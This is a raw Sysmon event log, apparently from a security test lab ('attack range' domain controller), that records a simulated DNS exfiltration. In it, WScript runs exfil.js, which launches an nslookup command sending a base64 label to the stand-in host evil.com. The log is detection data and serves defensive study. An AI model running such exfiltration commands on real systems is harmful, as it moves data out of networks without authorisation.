14:16:38.599{2E1864BB-E13C-6299-0B00-000000005F02}6364748C:\Windows\system32\lsass.exe{2E1864BB-1722-629A-AA38-000000005F02}7028C:\Windows\system32\wbem\wmiprvse.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea6c|C:\Windows\system32\lsasrv.dll+e6b04|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000202406Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:38.599{2E1864BB-E13C-6299-0B00-000000005F02}6364748C:\Windows\system32\lsass.exe{2E1864BB-1722-629A-AA38-000000005F02}7028C:\Windows\system32\wbem\wmiprvse.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea6c|C:\Windows\system32\lsasrv.dll+e6b04|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000202405Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:38.599{2E1864BB-17A1-629A-783D-000000005F02}5552ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlmal.tmpMD5=05BA971AFDC62533F0A9B0611710936B,SHA256=CC7F6EF6FDFF1D48F32CBB164D99D5681824740D7C263CA1F614A2D5F388A371,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000202404Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:38.583{2E1864BB-17C6-629A-4141-000000005F02}76087460C:\Windows\system32\conhost.exe{2E1864BB-17C6-629A-4241-000000005F02}8096C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000202403Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:38.567{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000202402Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:38.567{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000202401Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:38.567{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000202400Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:38.567{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000202399Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:38.567{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-17C6-629A-4241-000000005F02}8096C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000202398Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:38.567{2E1864BB-17C6-629A-4041-000000005F02}37647772C:\Windows\system32\cmd.exe{2E1864BB-17C6-629A-4241-000000005F02}8096C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000202397Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:38.580{2E1864BB-17C6-629A-4241-000000005F02}8096C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ== evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-17C6-629A-4041-000000005F02}3764C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ== evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlmal.tmp 2>&1 10341000x8000000000000000202396Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:38.552{2E1864BB-E13E-6299-1000-000000005F02}3642072C:\Windows\system32\svchost.exe{2E1864BB-17C6-629A-4141-000000005F02}7608C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000202395Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:38.552{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-17C6-629A-4141-000000005F02}7608C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000202394Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:38.552{2E1864BB-17C6-629A-4141-000000005F02}76087460C:\Windows\system32\conhost.exe{2E1864BB-17C6-629A-4041-000000005F02}3764C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000202393Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:38.536{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-17C6-629A-4141-000000005F02}7608C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000202392Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:38.536{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000202391Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:38.536{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 354300x8000000000000000202390Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:37.063{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52902- 354300x8000000000000000202389Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:37.063{00000000-0000-0000-0000-000000000000}7468<unknown process>-udptruefalse127.0.0.1-52902-false127.0.0.1-53domain 10341000x8000000000000000202388Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:38.536{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 354300x8000000000000000202387Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:37.063{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52901- 10341000x8000000000000000202386Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:38.536{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 354300x8000000000000000202385Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:37.062{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52900- 354300x8000000000000000202384Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:37.062{00000000-0000-0000-0000-000000000000}7468<unknown process>-udptruefalse127.0.0.1-52900-false127.0.0.1-53domain 10341000x8000000000000000202383Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:38.536{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-17C6-629A-4041-000000005F02}3764C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 354300x8000000000000000202382Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:36.916{00000000-0000-0000-0000-000000000000}2736<unknown process>-udpfalsefalse127.0.0.1-52899-false127.0.0.1-53domain 354300x8000000000000000202381Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:36.915{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52899- 354300x8000000000000000202380Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:36.915{00000000-0000-0000-0000-000000000000}2736<unknown process>-udptruefalse127.0.0.1-52899-false127.0.0.1-53domain 10341000x8000000000000000202379Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:38.536{2E1864BB-17A1-629A-783D-000000005F02}55527832C:\Windows\System32\WScript.exe{2E1864BB-17C6-629A-4041-000000005F02}3764C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 354300x8000000000000000202378Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:36.914{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52898- 354300x8000000000000000202377Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:36.913{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52897- 154100x8000000000000000202376Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:38.543{2E1864BB-17C6-629A-4041-000000005F02}3764C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ== evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlmal.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-17A1-629A-783D-000000005F02}5552C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 354300x8000000000000000202375Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:36.913{00000000-0000-0000-0000-000000000000}2736<unknown process>-udptruefalse127.0.0.1-52897-false127.0.0.1-53domain 354300x8000000000000000202374Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:36.764{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52896- 354300x8000000000000000202373Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:36.763{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52895- 354300x8000000000000000202372Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:36.763{00000000-0000-0000-0000-000000000000}2604<unknown process>-udpfalsefalse127.0.0.1-52894-false127.0.0.1-53domain 354300x8000000000000000202371Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:36.762{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52894- 354300x8000000000000000202370Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:36.762{00000000-0000-0000-0000-000000000000}2604<unknown process>-udptruefalse127.0.0.1-52894-false127.0.0.1-53domain 354300x8000000000000000202369Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:36.647{00000000-0000-0000-0000-000000000000}2652<unknown process>-udpfalsefalse127.0.0.1-52893-false127.0.0.1-53domain 354300x8000000000000000202368Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:36.647{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52893- 354300x8000000000000000202367Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:36.647{00000000-0000-0000-0000-000000000000}2652<unknown process>-udptruefalse127.0.0.1-52893-false127.0.0.1-53domain 354300x8000000000000000202366Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:36.646{00000000-0000-0000-0000-000000000000}2652<unknown process>-udpfalsefalse127.0.0.1-52892-false127.0.0.1-53domain 354300x8000000000000000202365Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:36.646{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52892- 354300x8000000000000000202364Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:36.646{00000000-0000-0000-0000-000000000000}2652<unknown process>-udptruefalse127.0.0.1-52892-false127.0.0.1-53domain 354300x8000000000000000202363Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:36.645{00000000-0000-0000-0000-000000000000}2652<unknown process>-udpfalsefalse127.0.0.1-52891-false127.0.0.1-53domain 354300x8000000000000000202362Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:36.645{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52891- 354300x8000000000000000202361Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:36.645{00000000-0000-0000-0000-000000000000}2652<unknown process>-udptruefalse127.0.0.1-52891-false127.0.0.1-53domain 354300x8000000000000000202360Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:36.522{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52890- 354300x8000000000000000202359Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:36.522{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52889- 354300x8000000000000000202358Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:36.521{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52888- 354300x8000000000000000202357Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:36.521{00000000-0000-0000-0000-000000000000}4624<unknown process>-udptruefalse127.0.0.1-52888-false127.0.0.1-53domain 354300x8000000000000000202356Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:36.417{00000000-0000-0000-0000-000000000000}7236<unknown process>-udpfalsefalse127.0.0.1-52887-false127.0.0.1-53domain 